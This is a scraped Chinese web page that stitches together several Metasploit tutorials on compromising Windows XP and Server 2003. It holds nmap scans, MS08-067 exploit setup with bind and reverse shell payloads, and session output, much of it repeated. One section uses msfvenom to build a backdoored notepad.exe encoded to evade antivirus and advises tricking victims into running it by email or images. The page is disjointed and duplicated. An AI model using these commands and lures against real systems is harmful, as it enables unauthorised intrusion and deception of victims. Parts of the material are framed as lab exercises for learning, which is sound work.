exploit/windows/smb/psexeec什么smb漏洞ms17 101

22080人阅读
渗透相关(44)
被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English
攻击者IP地址:192.168.9.1
//查看数据库连接状态
msf & db_status
[*] postgresql connected to msf3
//使用nmap扫描目标机器
msf & db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.9.4
[*] Nmap: Starting Nmap 5.61TEST4 (
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT&&& STATE SERVICE&&&&& VERSION
[*] Nmap: 135/tcp open& msrpc&&&&&&& Microsoft Windows RPC
[*] Nmap: 139/tcp open& netbios-ssn
[*] Nmap: 445/tcp open& microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: W CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |&& MS08-067: VULNERABLE
[*] Nmap: |&& Conficker: Likely CLEAN
[*] Nmap: |&& regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |&& SMBv2 DoS (CVE-): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |&& MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: |_& MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
//查找ms08_067漏洞
msf & search ms08_067
Matching Modules
================
&& Name&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& Disclosure Date&&&&&&&&& Rank&& Description
&& ----&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& ---------------&&&&&&&&& ----&& -----------
&& exploit/windows/smb/ms08_067_netapi&
00:00:00 UTC& great& Microsoft Server Service Relative Path Stack Corruption
//使用MS08_067漏洞
msf & use exploit/windows/smb/ms08_067_netapi
//设置远程地址,正向连接
msf& exploit(ms08_067_netapi) & set RHOST 192.168.9.4
RHOST =& 192.168.9.4
//设置ShellCode
msf& exploit(ms08_067_netapi) & set payload windows/shell_bind_tcp
payload =& windows/shell_bind_tcp
//显示配置的选项
msf& exploit(ms08_067_netapi) & show options
Module options (exploit/windows/smb/ms08_067_netapi):
&& Name&&&& Current Setting& Required& Description
&& ----&&&& ---------------& --------& -----------
&& RHOST&&& 192.168.9.4&&&&& yes&&&&&& The target address
&& RPORT&&& 445&&&&&&&&&&&&& yes&&&&&& Set the SMB service port
&& SMBPIPE& BROWSER&&&&&&&&& yes&&&&&& The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
&& Name&&&&& Current Setting& Required& Description
&& ----&&&&& ---------------& --------& -----------
&& EXITFUNC& thread&&&&&&&&&& yes&&&&&& Exit technique: seh, thread, process, none
&& LPORT&&&& 4444&&&&&&&&&&&& yes&&&&&& The listen port
&& RHOST&&&& 192.168.9.4&&&&& no&&&&&&& The target address
Exploit target:
&& Id& Name
&& --& ----
&& 0&& Automatic Targeting
msf& exploit(ms08_067_netapi) & exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.9.1:1126 -& 192.168.9.4:4444) at
11:04:31 +0800
成功返回Shell
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright
Microsoft Corp.
C:\WINDOWS\system32&net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator&&&&&&&&&&& Guest&&&&&&&&&&&&&&&&&&& hacker
HelpAssistant&&&&&&&&&&& SUPPORT_
The command completed with one or more errors.
------------------------------------------------------------------------------------------------------------------------
如果想漏洞支持什么操作系统,可以输入info命令,就能看到关于漏洞的详细信息。
&&相关文章推荐
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:918766次
积分:11357
积分:11357
排名:第1323名
原创:362篇
转载:42篇
评论:127条
(1)(6)(3)(6)(3)(1)(3)(2)(1)(10)(16)(1)(2)(1)(1)(2)(7)(2)(2)(6)(9)(2)(4)(8)(3)(8)(7)(5)(4)(5)(5)(2)(1)(2)(2)(6)(4)(2)(6)(5)(5)(9)(17)(10)(6)(3)(3)(2)(9)(5)(1)(8)(5)(4)(5)(4)(6)(1)(1)(1)(3)(2)(7)(13)(4)(11)(12)(10)(8)(6)(5)(2)(4)(17)(5)(14)(6)(4)(3)MS08_067漏洞渗透攻击实践
实验前准备
1、两台虚拟机,其中一台为kali,一台为windows xp sp3(英文版)。
2、在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机就可以直接ping通。如下图:
如果ping不通,一般是ip地址不在同一个网段上,需要重新设置xp的ip地址,打开:控制面板-&网络连接-&右击本地连接选择属性-&选择internet协议(TCP/IP)-&属性,就可以编辑ip地址了。例如:kali ip是192.168.241.131,xp ip设置为:192.168.241.130。前三位一样,最后一位随便设置。
MS08_067远程漏洞攻击实践:Shell
1、在kali终端中开启msfconsole。
2、输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:
3、输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。
4、输入命令show payload会显示出有效的攻击载荷,如下图所示,我们找到一个shell_reverse_tcp。
5、命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:
6、使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。
7、输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。
8、输入命令
set LHOST "kali Ip"
set RHOST "Win xp Ip"
并使用命令show options再次查看payload状态。
9、输入命令exploit开始攻击,如下图所示是正常攻击成功结果。
在kali上执行ipconfig/all得到如下图所示:
在win xp上执行同样的命令,如下图所示:
MS08_067远程漏洞攻击实践:meterpreter
1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。
2、设置payload:set payload windows/meterpreter/reverse_tcp
3、show options,查看需要设置的ip地址,如下图所示,是已经设置好的
4、成功攻击结果:
5、执行ifconfig,查看靶机地址:
6、ps查看进程:
7、meterpreter转shell:
实验中遇到的问题
1、在做实验的时候用老师的xp系统作为靶机,但是在exploit的时候显示如下:no session was created。
2、手动设置一个set session 1,结果还是不成功。
3、在exploit前,使用check查看靶机状态,返回以下信息,表明目标主机是安全的,不能被攻击。
4、网上查到可以卸载ms08_067的补丁,即卸载KB958644,文件路径:c:/windows找到KB958644(这是个隐藏文件),打开卸载exe程序,如下:
5、重启后,还是不能成功,最后找了一个英文版的win xp sp 3 ,才成功完成。
阅读(...) 评论()22082人阅读
渗透相关(44)
被攻击者IP地址:192.168.9.4,操作系统Windows XP sp3 English
攻击者IP地址:192.168.9.1
//查看数据库连接状态
msf & db_status
[*] postgresql connected to msf3
//使用nmap扫描目标机器
msf & db_nmap -sS -sV -O --script=smb-check-vulns.nse -n 192.168.9.4
[*] Nmap: Starting Nmap 5.61TEST4 (
[*] Nmap: Nmap scan report for 192.168.9.4
[*] Nmap: Host is up (0.00s latency).
[*] Nmap: Not shown: 997 closed ports
[*] Nmap: PORT&&& STATE SERVICE&&&&& VERSION
[*] Nmap: 135/tcp open& msrpc&&&&&&& Microsoft Windows RPC
[*] Nmap: 139/tcp open& netbios-ssn
[*] Nmap: 445/tcp open& microsoft-ds Microsoft Windows XP microsoft-ds
[*] Nmap: MAC Address: 00:0C:29:43:D6:5F (VMware)
[*] Nmap: Device type: general purpose
[*] Nmap: Running: Microsoft Windows XP|2003
[*] Nmap: OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003
[*] Nmap: OS details: Microsoft Windows XP SP2 or SP3, or Windows Server 2003
[*] Nmap: Network Distance: 1 hop
[*] Nmap: Service Info: OS: W CPE: cpe:/o:microsoft:windows
[*] Nmap: Host script results:
[*] Nmap: | smb-check-vulns:
[*] Nmap: |&& MS08-067: VULNERABLE
[*] Nmap: |&& Conficker: Likely CLEAN
[*] Nmap: |&& regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |&& SMBv2 DoS (CVE-): CHECK DISABLED (add '--script-args=unsafe=1' to run)
[*] Nmap: |&& MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: |_& MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
[*] Nmap: OS and Service detection performed. Please report any incorrect results at .
[*] Nmap: Nmap done: 1 IP address (1 host up) scanned in 10.28 seconds
//查找ms08_067漏洞
msf & search ms08_067
Matching Modules
================
&& Name&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& Disclosure Date&&&&&&&&& Rank&& Description
&& ----&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&&& ---------------&&&&&&&&& ----&& -----------
&& exploit/windows/smb/ms08_067_netapi&
00:00:00 UTC& great& Microsoft Server Service Relative Path Stack Corruption
//使用MS08_067漏洞
msf & use exploit/windows/smb/ms08_067_netapi
//设置远程地址,正向连接
msf& exploit(ms08_067_netapi) & set RHOST 192.168.9.4
RHOST =& 192.168.9.4
//设置ShellCode
msf& exploit(ms08_067_netapi) & set payload windows/shell_bind_tcp
payload =& windows/shell_bind_tcp
//显示配置的选项
msf& exploit(ms08_067_netapi) & show options
Module options (exploit/windows/smb/ms08_067_netapi):
&& Name&&&& Current Setting& Required& Description
&& ----&&&& ---------------& --------& -----------
&& RHOST&&& 192.168.9.4&&&&& yes&&&&&& The target address
&& RPORT&&& 445&&&&&&&&&&&&& yes&&&&&& Set the SMB service port
&& SMBPIPE& BROWSER&&&&&&&&& yes&&&&&& The pipe name to use (BROWSER, SRVSVC)
Payload options (windows/shell_bind_tcp):
&& Name&&&&& Current Setting& Required& Description
&& ----&&&&& ---------------& --------& -----------
&& EXITFUNC& thread&&&&&&&&&& yes&&&&&& Exit technique: seh, thread, process, none
&& LPORT&&&& 4444&&&&&&&&&&&& yes&&&&&& The listen port
&& RHOST&&&& 192.168.9.4&&&&& no&&&&&&& The target address
Exploit target:
&& Id& Name
&& --& ----
&& 0&& Automatic Targeting
msf& exploit(ms08_067_netapi) & exploit
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability...
[*] Command shell session 1 opened (192.168.9.1:1126 -& 192.168.9.4:4444) at
11:04:31 +0800
成功返回Shell
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright
Microsoft Corp.
C:\WINDOWS\system32&net user
User accounts for \\
-------------------------------------------------------------------------------
Administrator&&&&&&&&&&& Guest&&&&&&&&&&&&&&&&&&& hacker
HelpAssistant&&&&&&&&&&& SUPPORT_
The command completed with one or more errors.
------------------------------------------------------------------------------------------------------------------------
如果想漏洞支持什么操作系统,可以输入info命令,就能看到关于漏洞的详细信息。
&&相关文章推荐
* 以上用户言论只代表其个人观点,不代表CSDN网站的观点或立场
访问:918767次
积分:11357
积分:11357
排名:第1323名
原创:362篇
转载:42篇
评论:127条
(1)(6)(3)(6)(3)(1)(3)(2)(1)(10)(16)(1)(2)(1)(1)(2)(7)(2)(2)(6)(9)(2)(4)(8)(3)(8)(7)(5)(4)(5)(5)(2)(1)(2)(2)(6)(4)(2)(6)(5)(5)(9)(17)(10)(6)(3)(3)(2)(9)(5)(1)(8)(5)(4)(5)(4)(6)(1)(1)(1)(3)(2)(7)(13)(4)(11)(12)(10)(8)(6)(5)(2)(4)(17)(5)(14)(6)(4)(3)我使用Kali Linux的IP地址是192.168.0.112;在同一局域网内有一台运行Windows XP(192.168.0.108)的测试电脑。
本文演示怎么使用Metasploit入侵windows xp sp3。
启动msfconsole:
# msfconsole
选择一个漏洞:
msf & search platform: windows xp sp3
exploit/windows/smb/ms08_067_netapi是08年发现的漏洞,等级Great。
查看某个漏洞的详细信息;包含使用方法、支持的平台等等,非常有帮助:
msf & info exploit/windows/smb/ms08_067_netapi
依次执行如下命令:
msf & use exploit/windows/smb/ms08_067_netapi
& set payload windows/meterpreter/bind_tcp
& set RHOST 192.168.0.108
(设置目标主机IP地址)
如果目标主机有这个漏洞的话,你就可以控制它了;如果没有,尝试使用其他漏洞。
[*] Started bind handler
[*] Automatically detecting the target...
[*] Fingerprint: Windows XP SP3 - Service Pack 3 - lang:Chinese
[*] Selected Target: Windows XP SP3 Chinese (AlwaysOn NK)
[*] Attempting to trigger the vulnerability...
[*] Sending stage (751104 bytes) to 192.168.0.108
[*] Meterpreter session 1 opened (192.168.0.1:41614 -& 192.168.0.108:4444) at
meterpreter &
现在你就可以控制目标主机了,可以截屏、录音、视频、下载文件、杀进程等等;使用help查看可以执行的命令。
演示使用后门程序侵入Windows
原理:在Kali Linux上生成后门程序,然后把它发送给受害者,欺骗受害者运行(使用邮件、图片等等)。难点是需要过杀毒软件和防火墙。
生成后门程序:
我把后门程序隐藏到记事本程序中:notepad.exe
查看Kali Linux的IP:ifconfig(192.168.0.112)
创建后门程序,my_backdoor.exe:
# msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4445 -x NOTEPAD.EXE -e x86/jmp_call_additive -i 4 -k -f exe & my_backdoor.exe
上面命令使用加密试图躲过杀毒软件,但是,不要期望它可以生效。使用man msfvenom查看帮助。
把它发送到Windows系统,并运行;如果不能运行换用其他加密方式。
启动msfconsole:
# msfconsole
use exploit/multi/handler
set LHOST 192.168.0.112
set LPORT 4445
set payload windows/meterpreter/reverse_tcp
show options
等待受害者启动后门程序。
OK,入侵成功。
阅读(...) 评论()
本站总访问量次| 您所在的位置: >
> 在BT5里Metasploit内网渗透(exploit/windows/smb/psexec)在BT5里Metasploit内网渗透(exploit/windows/smb/psexec)更新:&&&&编辑:冬翠&&&&来源:会员投稿&&&&人气:加载中...&&&&字号:|标签:&&&&&&&&&&&&
使用 BT5 入侵内部网络目标IP地址192.168.111.135 ( server 2003 sp2)bt5 的IP地址192.168.111.134入侵条件:目标机器的ip &用户名 &密码因为非法是不允许的,所以我在虚拟机里面实验首先,我们来查看bt5和win2k3的ip地址进入shell可以使用cmd命令行进行操作如果拿下了一台机器。在bt5里面可以自带的远程(一般的服务器都开了这个功能),如下实验到这里这台windows 2003 就算是彻底的沦陷了。。。本文出自 “无痕” ,请务必保留此出处
| 分类选择您可能在找这些}

我要回帖

更多关于 smb服务漏洞 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信